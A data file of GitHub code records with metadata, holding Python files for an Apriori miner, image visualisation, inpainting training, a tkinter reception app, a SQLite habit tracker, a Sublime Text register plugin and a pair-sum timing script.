"7832501281", "text": "from itertools import count\r\nfrom collections import Counter\r\nfrom collections.abc import Generator, Iterable\r\n\r\ndef cartesian_product(items: Iterable[str], n_set: int) \\\r\n -> Generator[str, None, None]:\r\n \"\"\"\r\n This function returns the cartesian product\r\n of the items with itself. The n_set is used \r\n to determine the total length of each element\r\n in the resulting set.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items: List of items.\r\n n_set: A positive integer.\r\n\r\n -------\r\n Returns\r\n -------\r\n This is a generator function that yields each\r\n element for the resulting set.\r\n \"\"\"\r\n \r\n for i in range(len(items) - 1):\r\n item_group: str = items[i]\r\n\r\n for j in range(i + 1, len(items)):\r\n s: set = set(item_group).union(items[j])\r\n\r\n if (len(s) == n_set):\r\n yield ''.join(sorted(s))\r\n\r\n\r\ndef get_freq(items: Iterable[str], transactions: list[set[str]], \r\n frequencies: Counter) -> None:\r\n \"\"\"\r\n This function calculates how many times an item group\r\n ocuured in all the transactions. An item group has\r\n occured in a single transaction when every items in\r\n the item group are present in that transaction.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items : List of items.\r\n transactions: List of transactions.\r\n frequencies : Dict storing frequencies of every item group.\r\n\r\n -------\r\n Returns\r\n -------\r\n This function mutates the `frequencies` that is passed\r\n and returns None.\r\n \"\"\"\r\n for transaction in transactions:\r\n for item_group in items:\r\n # if all the item in the item group is in \r\n # the transaction\r\n if (all(item in transaction for item in item_group)):\r\n frequencies[item_group] += 1\r\n\r\n\r\ndef apriori(items: Iterable[str], transactions: list[set[str]], \r\n min_support: float) -> dict:\r\n \"\"\"\r\n This function returns all the frequent patterns that\r\n has at least the given minimum support using apriori \r\n algorithm.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n items : List of items.\r\n transactions: List of transactions.\r\n min_support : Decimal number between 0 and 1\r\n denoting minimum support.\r\n\r\n -------\r\n Returns\r\n -------\r\n All the item groups having a support equal or greater \r\n than the minimum support.\r\n \"\"\"\r\n L: dict = {}\r\n frequencies: Counter = Counter()\r\n\r\n for n_set in count(start=1):\r\n get_freq(items, transactions, frequencies)\r\n support: dict = {\r\n item_group: frequencies[item_group] / len(transactions) \r\n for item_group in items\r\n }\r\n # Get items whose value is greater than or \r\n # equal to the minimum support\r\n L_temp: dict = {\r\n item_group: support[item_group] \r\n for item_group in support \r\n if support[item_group] >= min_support\r\n }\r\n # Clear the `frequencies` to save memory\r\n frequencies.clear()\r\n # If `L_temp` is empty, break out of the loop\r\n if (not L_temp):\r\n break\r\n\r\n L: dict = {**L, **L_temp}\r\n items: set = set(cartesian_product(tuple(L_temp.keys()), n_set + 1))\r\n\r\n return L\r\n\r\n\r\ndef get_rules(itemsets: dict, conf_lvl: float) \\\r\n -> list[tuple[str, str, float]]:\r\n \"\"\"\r\n This function returns all the association\r\n rules present in the given itemset that is\r\n above or equal to the minimum confidence\r\n level.\r\n\r\n For X and Y be any arbitrary item group in\r\n a given itemset, the conditions for finding \r\n association rules are as follows:\r\n\r\n 1. 
X -> Y is possible if XY is also present\r\n in the itemset.\r\n\r\n 2. X -> Y is possible is X ∩ Y = Φ.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n itemsets : Dicts containing item groups \r\n along with their support.\r\n conf_lvl : Decimal number between 0 and 1\r\n denoting a minimum confidence.\r\n\r\n -------\r\n Returns\r\n -------\r\n List of association rules that are equal or\r\n greater than the minimum confidence.\r\n \"\"\"\r\n rules = []\r\n item_groups = tuple(itemsets.keys())\r\n N = len(item_groups)\r\n\r\n for i in range(N - 1):\r\n X: str = item_groups[i]\r\n \r\n for j in range(i, N):\r\n Y: str = item_groups[j]\r\n if (len(set(X) & set(Y)) != 0): continue\r\n item_group: str = ''.join(sorted(set(X) | set(Y)))\r\n if (itemsets.get(item_group) is None): continue\r\n\r\n conf_x_y: float = itemsets[item_group] / itemsets[X]\r\n conf_y_x: float = itemsets[item_group] / itemsets[Y]\r\n\r\n if (conf_x_y >= conf_lvl): rules.append((X, Y, conf_x_y))\r\n if (conf_y_x >= conf_lvl): rules.append((Y, X, conf_y_x))\r\n\r\n return rules\r\n\r\n\r\nif __name__ == \"__main__\":\r\n transactions = [\r\n {'A', 'C', 'E'}, # Transaction 1\r\n {'C', 'E', 'F'}, # Transaction 2\r\n {'A', 'B', 'G'}, # Transaction 3\r\n {'A', 'D'}, # Transaction 4\r\n {'C', 'E', 'F', 'G'} # Transaction 5\r\n ]\r\n min_support = 0.3\r\n frequencies = Counter()\r\n items = ('A', 'B', 'C', 'D', 'E', 'F', 'G')\r\n result = apriori(items, transactions, min_support)\r\n\r\n for k, v in result.items():\r\n print(f\"{k} = {v}\")", "repo_name": "J16N/Data-Mining", "sub_path": "apriori_algo.py", "file_name": "apriori_algo.py", "file_ext": "py", "file_size_in_byte": 5459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.abc.Iterable", "line_number": 5, "usage_type": "name"}, {"api_name": "collections.abc.Generator", "line_number": 6, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 36, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 37, "usage_type": "name"}, {"api_name": "collections.abc.Iterable", "line_number": 65, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 87, "usage_type": "name"}, {"api_name": "itertools.count", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "73263116006", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\n\ndef imshow_helper(img, ax, title, cmap=None, xticks=False, yticks=False):\n ax.imshow(img, cmap=cmap)\n ax.set_title(title)\n if not xticks:\n ax.set_xticks([])\n if not yticks:\n ax.set_yticks([])\n\n\ndef visualize(input_image, img_type):\n # Fill in this function. 
Remember to remove the pass command\n\n img_type_to_channels = {\n \"opponent\": [\"O1\", \"O2\", \"O3\"],\n \"rgb\": [\"r\", \"g\", \"b\"],\n \"ycbcr\": [\"Y\", \"Cb\", \"Cr\"],\n \"hsv\": [\"Hue\", \"Saturation\", \"Value\"],\n \"original\": [\"R\", \"G\", \"B\"],\n }\n\n fig, ax = plt.subplots(1, 4, figsize=(10, 4))\n\n if img_type == \"gray\":\n # plot 4 variants of gray-scale image\n titles = [\"Lightness\", \"Average\", \"Luminosity\", \"OpenCV\"]\n assert input_image.shape[-1] == 4\n for i in range(input_image.shape[-1]):\n imshow_helper(input_image[..., i], ax[i], titles[i], cmap=\"gray\")\n\n else:\n # set complete image\n imshow_helper(input_image, ax[0], \"Converted image\", cmap=\"gray\")\n\n # set individual channels\n for i in range(3):\n imshow_helper(\n input_image[..., i], ax[i + 1],\n \"Channel {}\".format(img_type_to_channels[img_type][i]),\n cmap=\"gray\"\n )\n\n fpath = \"./{}.png\".format(img_type)\n plt.savefig(fpath, bbox_inches=\"tight\")\n\n plt.show()\n", "repo_name": "bpiyush/CV1labs", "sub_path": "lab1/colourspace/visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "17244665837", "text": "import os\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torchvision.utils as vutils\nfrom data.data import InpaintingDataset, ToTensor\nfrom model.net import InpaintingModel_GMCNN\nfrom options.train_options import TrainOptions\nfrom util.utils import getLatest\n\nconfig = TrainOptions().parse()\n\nprint('loading data..')\ndataset = InpaintingDataset(config.dataset_path, '', transform=transforms.Compose( [ToTensor()] ))\ndataloader = DataLoader(dataset, batch_size=config.batch_size, shuffle=True, num_workers=0, drop_last=True)\nprint('data loaded..')\n\nprint('Preparing model..')\nourModel = InpaintingModel_GMCNN(in_channels=4, opt=config)\n\nif config.load_model_dir != '':\n ourModel.load_networks(getLatest(os.path.join(config.load_model_dir, '*.pth')))\n\nprint('Initializing training..')\n\nfor epoch in range(config.epochs):\n\n for i, data in enumerate(dataloader):\n gt = data['gt'].cuda()\n gt = gt / 127.5 - 1\n\n data_in = {'gt': gt}\n ourModel.setInput(data_in)\n ourModel.optimize_parameters()\n\n if (i+1) % config.viz_steps == 0:\n loss = ourModel.get_current_losses()\n if config.pretrain_network is False:\n print(\n '[%d, %5d] G_loss: %.4f (rec: %.4f, ae: %.4f, adv: %.4f, mrf: %.4f), D_loss: %.4f'\n % (epoch + 1, i + 1, loss['G_loss'], loss['G_loss_rec'], loss['G_loss_ae'],\n loss['G_loss_adv'], loss['G_loss_mrf'], loss['D_loss']))\n else:\n print('[%d, %5d] G_loss: %.4f (rec: %.4f, ae: %.4f)'\n % (epoch + 1, i + 1, loss['G_loss'], loss['G_loss_rec'], loss['G_loss_ae']))\n\n images = ourModel.get_current_visuals_tensor()\n image_completed = vutils.make_grid(images['completed'], normalize=True, scale_each=True)\n image_input = vutils.make_grid(images['input'], normalize=True, scale_each=True)\n 
image_gt = vutils.make_grid(images['gt'], normalize=True, scale_each=True)\n            if (i+1) % config.train_spe == 0:\n                print('saving model ..')\n                ourModel.save_networks(epoch+1)\n        ourModel.save_networks(epoch+1)\n\n", "repo_name": "shikivi/Eliminate-the-selected-objects-in-video", "sub_path": "Image Inpainting/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.train_options.TrainOptions", "line_number": 10, "usage_type": "call"}, {"api_name": "data.data.InpaintingDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "data.data.ToTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "model.net.InpaintingModel_GMCNN", "line_number": 18, "usage_type": "call"}, {"api_name": "util.utils.getLatest", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "data.data", "line_number": 27, "usage_type": "name"}, {"api_name": "data.data", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 47, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 47, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 48, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 48, "usage_type": "name"}, {"api_name": "torchvision.utils.make_grid", "line_number": 49, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "4061196425", "text": "from tkinter import *\nfrom tkinter import ttk\nfrom twisted.internet import tksupport, reactor, threads\nfrom tkinter import simpledialog\n\nfrom .data import *\n\nclass OfficeManager(Frame):\n\n    def __init__(self, parent):\n\n        super().__init__(parent, height=1000)\n\n        # Define Variables\n        self.parent = parent\n\n        # Treeview Setup\n        self.managerScroll = Scrollbar(self)\n        self.manager = ttk.Treeview(self, yscrollcommand=self.managerScroll.set)\n        self.managerScroll[\"command\"] = self.manager.yview\n\n        self.manager[\"columns\"] = (\"#1\", \"#2\")\n        self.manager.heading(\"#0\", text=\"Room ID\")\n        self.manager.heading(\"#1\", text=\"Room Name/Title\")\n        self.manager.heading(\"#2\", text=\"Current Tenant\")\n\n        # Pack Widgets\n        self.managerScroll.pack(side=RIGHT, fill=Y)\n        self.manager.pack(side=TOP, fill=BOTH, expand=True)\n\n    def new_global_notice(self, *args):\n\n        try:\n            message = simpledialog.askstring(title=\"Send Global Notice\", prompt=\"What would you like to say?\")\n        finally:\n            # Submit Notification to Server\n            title = \"Notice for All Offices - Reception Desk\"\n\n            # Notification Setup\n            notif = Notification(title, message)\n\n            self.parent.factory.send_global_notice(notif)\n        \n\nclass NoticeManager(Toplevel):\n\n    def __init__(self, parent, office=None):\n\n        super().__init__(parent)\n\n        # Define Variables\n        self.parent = parent\n        self.office = office\n\n        # Window Setup\n        #tksupport.install(self)\n        if office == None:\n            self.title(\"Send Notice - All Offices\")\n        else:\n            self.title(\"Send Notice - \" + office.id)\n\n        # Notification Input 
Setup\n self.title = StringVar()\n self.message = StringVar()\n\n self.titleEntry = Text(self, width=100, height=1)\n self.messageEntry = Text(self, width=100, height=5)\n\n self.titleEntry.pack(side=TOP, pady=10)\n self.messageEntry.pack(side=TOP, pady=10, padx=20)\n\n self.submit = ttk.Button(self, text=\"Send\", command=self.submit)\n self.submit.pack(side=TOP, anchor=E, pady=10, padx=20)\n\n # Window Loop\n self.mainloop()\n\n def send(self, notif):\n\n # Send Notification\n if self.office == None:\n self.parent.factory.send_global_notice(notif)\n\n def submit(self, *args):\n\n # Submit Notification to Server\n title = self.titleEntry.get(\"1.0\", END)\n message = self.messageEntry.get(\"1.0\", END)\n\n # Notification Setup\n notif = Notification(title, message)\n\n reactor.callInThread(self.send, notif)\n \n # Destroy Window\n self.destroy()\n", "repo_name": "FlopsiBunny/ReceptionDemo", "sub_path": "Console/lib/offices.py", "file_name": "offices.py", "file_ext": "py", "file_size_in_byte": 2739, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.ttk.Treeview", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 19, "usage_type": "name"}, {"api_name": "tkinter.simpledialog.askstring", "line_number": 34, "usage_type": "call"}, {"api_name": "tkinter.simpledialog", "line_number": 34, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.callInThread", "line_number": 93, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "39438742265", "text": "import sqlite3\n\n\n# 1) CREATE HABIT TABLE\ndef CreateHabitTable():\n try:\n # SAVE IN MEMORY, EVERYTIME ALL DATA CREATED IS RESTARTED FROM NOTHING\n # db = sqlite3.connect(':memory:')\n db = sqlite3.connect('habits.db')\n # db.execute(\"PRAGMA foreign_keys = 1\") # NOT WORKING: TO ACTIVATE CASCADE FUNC IN SQLITE3\n cur = db.cursor()\n except sqlite3.Error as e:\n print(\"Error, please restart the application again.\")\n exit(1)\n\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS habits (\n habit_id INTEGER PRIMARY KEY AUTOINCREMENT,\n taskname TEXT NOT NULL,\n description TEXT,\n operator TEXT NOT NULL,\n target_quantity REAL NOT NULL,\n unit TEXT NOT NULL,\n frequency TEXT NOT NULL,\n days_to_success INTEGER NOT NULL,\n login_id INTEGER NOT NULL, \n FOREIGN KEY (login_id) REFERENCES users (login_id)\n ON UPDATE CASCADE\n ON DELETE CASCADE\n )\"\"\")\n\n db.close()\n\n# 2) INSERT ROW IN TABLE\ndef InsertHabit(task):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n # THIS METHOD DON'T NEED db.commit()\n with db:\n # cur.execute(\"INSERT INTO habits VALUES (null, :taskname, :description, :event, :operator, :target_quantity, :unit, :frequency, :days_to_success)\",\n # {'taskname': task.taskname, 'description': task.description, 'event': task.event, 'operator': task.operator, 'target_quantity': task.target_quantity, 'unit': task.unit, 'frequency': task.frequency, 'days_to_success': task.days_to_success})\n cur.execute(\"INSERT INTO habits VALUES (null, ?, ?, ?, ?, ?, ?, ?, ?)\",\n (task.taskname, task.description, task.operator, task.target_quantity, task.unit, task.frequency, task.days_to_success, task.login_id))\n db.close()\n\n# 3) SEARCH IF ALREADY CREATED PRESET USERS\ndef 
SearchFirstHabit(login_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT login_id FROM habits WHERE login_id=:login_id\", {'login_id': login_id})\n return cur.fetchall()\n\n db.close()\n\n# 4) SHOW INFO\ndef AllHabit(login_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT habit_id, taskname FROM habits WHERE login_id=:login_id\", {'login_id': login_id})\n return cur.fetchall()\n\n db.close()\n\n# 5) SHOW LATEST ROW INFO\ndef SearchLatestHabit():\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"\"\"SELECT days_to_success, habit_id, taskname FROM habits \n WHERE habit_id=\n (SELECT habit_id FROM habits ORDER BY habit_id DESC LIMIT 1)\"\"\")\n\n return cur.fetchall()[0]\n\n db.close()\n\n# 6) SEARCH INFO\ndef SearchHabit(habit_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT taskname, operator, target_quantity, unit, frequency, days_to_success FROM habits WHERE habit_id=:habit_id\", {'habit_id': habit_id})\n return cur.fetchall()\n\n db.close()\n\n# 7) SEARCH INFO\ndef DuplicateHabitCheck(taskname):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT * FROM habits WHERE taskname=:taskname\", {'taskname': taskname})\n return cur.fetchall()\n\n db.close()\n\n# 8) UPDATE INFO\ndef UpdateHabit(habit_id, operator, target_quantity, unit, frequency, days_to_success):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n with db:\n cur.execute(\"\"\"UPDATE habits SET operator = :operator, target_quantity = :target_quantity, unit = :unit, frequency = :frequency, days_to_success = :days_to_success\n WHERE habit_id=:habit_id\"\"\", {'operator': operator, 'target_quantity': target_quantity, 'unit': unit, 'frequency': frequency, 'days_to_success': days_to_success, 'habit_id': habit_id})\n\n db.close()\n\n# 9) REMOVE RECORD\ndef RemoveHabit(habit_id):\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n with db:\n cur.execute(\"DELETE FROM habits WHERE habit_id = :habit_id\", {'habit_id': habit_id})\n\n db.close()\n\n# 10) CHECK DATABASE\ndef CheckDB():\n db = sqlite3.connect('habits.db')\n cur = db.cursor()\n\n cur.execute(\"SELECT * FROM habits\")\n return cur.fetchall()\n\n db.close()\n\n# print(CheckDB())\n\n\n", "repo_name": "ConfitureCheung/Habit_Tracking", "sub_path": "45.IU Homework/round 4/habit_db.py", "file_name": "habit_db.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 81, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 91, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 101, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "36075607516", "text": "import functools as fu\nimport sublime\nimport sublime_plugin\nimport re\n\nfrom .lib.misc 
import *\n\nclass SbpRegisterStore:\n    \"\"\"\n    Base class to store data for the registers, could be a plain dict,\n    but we make it more complicated by wrapping the dict :)\n    \"\"\"\n    registers = {}\n\n    # If you want separate text and point registers, enabling mapping to the same keys,\n    # delete the global registers and uncomment the code below\n    # def __init__(self):\n    #     self.registers = {}\n\n    def get(self, key):\n        if not key in self.registers:\n            return \"\"\n        else:\n            return self.registers[key]\n\n    def format_for_popup(self, text):\n        # strip newlines, spaces and tabs from the beginning and end\n        text = text.strip(\"\\n \\t\")\n\n        # collapse multiple newlines into a single and convert to a glyph\n        # text = re.sub(\"\\n+\", \"↩\", text)\n        # text = re.sub(\"\\n+\", \"\\u23ce\", text)\n        text = re.sub(\"\\n+\", \"\\u00b6\", text)\n\n        # replace multiple white space with single spaces within the string\n        text = re.sub(\"\\\\s\\\\s+\", \" \", text)\n\n        # Old formatting before using glyphs\n        # text = text.strip(\"\\n \\t\").replace(\"\\n\", \" \\\\n\")\n        # text = re.sub(\"(\\s\\\\\\\\n)+\",\" \\\\\\\\n\", text)\n        # text = re.sub(\"\\\\s\\\\s+\", \" \", text)\n\n        return text\n\n    def truncate_for_popup(self, view, text, reg_type):\n        # Detect width of viewport and modify output text accordingly for better viewing\n        # 3 subtracted because the beginning of each register is like (a: ) before the start of\n        # the text\n        #\n        max_chars = (view.viewport_extent()[0] / view.em_width()) * .9 - 3\n\n        # truncate text registers showing half of the beginning and end portion\n        # for point registers just show the beginning portion where the jump will occur too\n        if len(text) > max_chars and reg_type == \"text\":\n            half = int(max_chars / 2)\n            text = text[:half] + \"\\u27FA\" + text[-half:] + \" \"\n        else:\n            text = text[:int(max_chars)] + \" \"\n\n        return text\n\n    def get_point_registers(self):\n        items = []\n        for item in self.registers.items():\n            if item[1][0] is not None:\n                items.append([item[0],self.format_for_popup(item[1][3])])\n        return items\n\n    def get_text_registers(self):\n        items = []\n        for item in self.registers.items():\n            if item[1][0] is None:\n                items.append([item[0],self.format_for_popup(item[1][3])])\n        return items\n\n    # TODO: Clear all text registers or point registers\n    # TODO: Possibly use pop-up to delete registers if easy\n\n\n    def store(self, key, val):\n        self.registers[key] = val\n\n    def __contains__(self, key):\n        return key in self.registers\n\n# Global variable to store data in the registers\nsbp_text_registers = SbpRegisterStore()\nsbp_point_registers = SbpRegisterStore()\n\nclass SbpPointToRegister(SbpTextCommand):\n    ''' Stores the current selection, if it is a single selection, in a special\n    register. This allows quick bookkeeping of positions in the document. However,\n    it also stores the window and the region so that focusing from other\n    windows is possible'''\n    panel = None\n\n    def run_cmd(self, jove):\n        self.jove = jove\n        self.panel = self.view.window().show_input_panel(\"Store point into register:\", \"\", \\\n            self.on_done, \\\n            self.on_change,\\\n            self.on_cancel)\n\n    def on_done(self, register):\n        pass\n\n    def on_cancel(self):\n        pass\n\n    def on_change(self, register):\n\n        if self.panel == None:\n            return\n\n        self.panel.window().run_command(\"hide_panel\")\n\n        sel = self.view.sel()\n        line = self.view.line(sel[0])\n        line_substr = ''\n        if (sel is None) or len(sel) != 1:\n            return\n\n        # grab first four lines below the current line for viewing of jump\n        for i in range(4):\n            line_substr += self.view.substr(line) + '\\n'\n            line = self.view.line(line.end()+2)\n\n        sbp_point_registers.store(register, (self.view, self.view.window(), sel[0],\n            line_substr))\n\n\nclass SbpJumpToPoint:\n    def jump(point_data):\n        point = point_data[2]\n\n        point_data[0].sel().clear()\n        point_data[0].sel().add(point)\n\n        point_data[1].focus_group(0)\n        point_data[1].focus_view(point_data[0])\n\n        # Check if the point is in view, if not scroll to\n        visible = point_data[0].visible_region()\n        if not visible.contains(point):\n            point_data[0].run_command(\"jove_center_view\")\n\n# For some reason switching windows does not work and we can only switch to files\n# in the current window\nclass SbpPointFromRegister(sublime_plugin.TextCommand):\n    '''Restore the point from a register with a given command. This will focus the\n    point even if it comes from another window and view'''\n\n    panel = None\n\n    def run(self, edit, register = None):\n        if register in sbp_point_registers:\n            self.insert(edit, register)\n        else:\n            self.panel = self.view.window().show_input_panel(\"Jump to point from register:\", \"\", \\\n                None, \\\n                fu.partial(self.insert, edit),\\\n                None)\n\n    def insert(self, edit, register):\n        if 
not self.panel:\n return\n\n self.panel.window().run_command(\"hide_panel\")\n\n sel = self.view.sel()\n if (sel is None) or len(sel) != 1:\n return\n\n self.view.window().run_command(\"sbp_register_do_insert\", {\"content\": sbp_text_registers.get(register)[3]})\n\nclass SbpChooseAndYankRegister(SbpTextCommand):\n\n def run_cmd(self, util):\n # items is an array of (index, text) pairs\n items = sbp_text_registers.get_text_registers()\n\n def on_done(idx):\n if idx >= 0:\n util.run_command(\"sbp_register_do_insert\", {\"content\": sbp_text_registers.get(items[idx][0])[3]})\n\n # To pass in for truncation of display strings\n view = self.view\n\n if items:\n sublime.active_window().show_quick_panel([item[0] + \": \" + sbp_text_registers.truncate_for_popup(view, item[1], \"text\") for item in items], on_done)\n else:\n sublime.status_message('Nothing in history')\nclass SbpChooseAndYankPoint(SbpTextCommand):\n\n def run_cmd(self, util):\n # items is an array of (index, text) pairs\n items = sbp_point_registers.get_point_registers()\n\n def on_done(idx):\n if idx >= 0:\n SbpJumpToPoint.jump(sbp_point_registers.get(items[idx][0]))\n\n # To pass in for truncation of display strings\n view = self.view\n\n if items:\n sublime.active_window().show_quick_panel([item[0] + \": \" + sbp_point_registers.truncate_for_popup(view, item[1], \"point\") for item in items], on_done)\n else:\n sublime.status_message('Nothing in history')\n # if items:\n # sublime.active_window().show_quick_panel([item[0] + \": \" + item[1][:viewTextLength] for item in items], on_done)\n # else:\n # sublime.status_message('Nothing in history')\n", "repo_name": "sublime-emacs/sublemacspro", "sub_path": "sbp_register.py", "file_name": "sbp_register.py", "file_ext": "py", "file_size_in_byte": 9024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 566, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "sublime_plugin.TextCommand", "line_number": 149, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 161, "usage_type": "call"}, {"api_name": "sublime.Region", "line_number": 213, "usage_type": "call"}, {"api_name": "sublime.Region", "line_number": 215, "usage_type": "call"}, {"api_name": "sublime.active_window", "line_number": 258, "usage_type": "call"}, {"api_name": "sublime.status_message", "line_number": 260, "usage_type": "call"}, {"api_name": "sublime.active_window", "line_number": 275, "usage_type": "call"}, {"api_name": "sublime.status_message", "line_number": 277, "usage_type": "call"}]} +{"seq_id": "72340662886", "text": "import sys\nimport time\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass BuscadorDePares:\n def __init__(self, argv):\n self.argv = argv\n self.ejecutar()\n\n @staticmethod\n def convertir_lista(lista):\n return list(map(int, lista))\n\n @staticmethod\n def encontrar_pares_original(arr, suma):\n pares = []\n for i in range(len(arr)):\n for j in range(i + 1, len(arr)):\n if arr[i] + arr[j] == suma:\n pares.append((arr[i], arr[j]))\n return pares\n\n @staticmethod\n def encontrar_pares_hash_table(arr, suma):\n hash_table = {}\n pares = []\n for num in arr:\n complemento = suma - num\n if complemento in hash_table:\n pares.append((num, complemento))\n hash_table[num] = True\n return pares\n\n def encontrar_pares(self, arr, suma):\n \n pares = []\n for i in range(len(arr)):\n for j in range(i + 1, len(arr)):\n if arr[i] 
+ arr[j] == suma:\n pares.append((arr[i], arr[j]))\n return pares\n\n\n\n def ejecutar(self):\n if len(self.argv) == 1:\n times = []\n tamanios = []\n for i in range(100):\n arreglo_i = []\n for j in range(i + 5):\n arreglo_i.append(random.randint(1, 100))\n tamanios.append(i + 5)\n inicio = time.perf_counter()\n resultado = self.encontrar_pares(arreglo_i, 0)\n final = time.perf_counter()\n times.append(final - inicio)\n plt.plot(tamanios, times, marker='o', linestyle='-', color='b', label='Datos de ejemplo')\n plt.show()\n elif len(self.argv) == 3:\n lista = self.convertir_lista(self.argv[1].split(','))\n inicio = time.perf_counter()\n resultado = self.encontrar_pares(lista, int(self.argv[2]))\n final = time.perf_counter()\n tiempoCalculado = final - inicio\n print(*resultado, sep='\\n')\n elif len(self.argv) == 2:\n tex = self.leer_archivo(self.argv[1])\n for i in range(len(tex)):\n lista = self.convertir_lista(tex[1].split()[0].split(','))\n resultado = self.encontrar_pares(lista, int(tex[i].split()[1]))\n print(*resultado, sep=\"\\n\")\n else:\n print(\"Los datos no son correctos\")\n\n # Obtener tiempos de ejecución para el enfoque original\n times_original = []\n for i in range(5, 105, 5):\n arreglo_i = [random.randint(1, 100) for _ in range(i)]\n inicio = time.perf_counter()\n resultado = self.encontrar_pares_original(arreglo_i, 12) # Buscar el número 12 como objetivo\n final = time.perf_counter()\n times_original.append(final - inicio)\n\n # Obtener tiempos de ejecución para el enfoque con tabla de hash\n times_hash_table = []\n for i in range(5, 105, 5):\n arreglo_i = [random.randint(1, 100) for _ in range(i)]\n inicio = time.perf_counter()\n resultado = self.encontrar_pares_hash_table(arreglo_i, 12) # Buscar el número 12 como objetivo\n final = time.perf_counter()\n times_hash_table.append(final - inicio)\n\n # Graficar los resultados\n tamanios = list(range(5, 105, 5))\n plt.plot(tamanios, times_original, marker='o', linestyle='-', color='b', label='Enfoque Original')\n plt.plot(tamanios, times_hash_table, marker='o', linestyle='-', color='r', label='Tabla de Hash')\n\n plt.xlabel('Tamaño de la lista de entrada')\n plt.ylabel('Tiempo de ejecución (segundos)')\n plt.title('Comparación de tiempos de ejecución entre enfoques')\n plt.legend()\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n buscador_de_pares = BuscadorDePares(sys.argv)\n", "repo_name": "ValEscoSierra/Reto-Analisis-de-Complejidad", "sub_path": "samineitor_analisis.py", "file_name": "samineitor_analisis.py", "file_ext": "py", "file_size_in_byte": 3971, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 54, "usage_type": 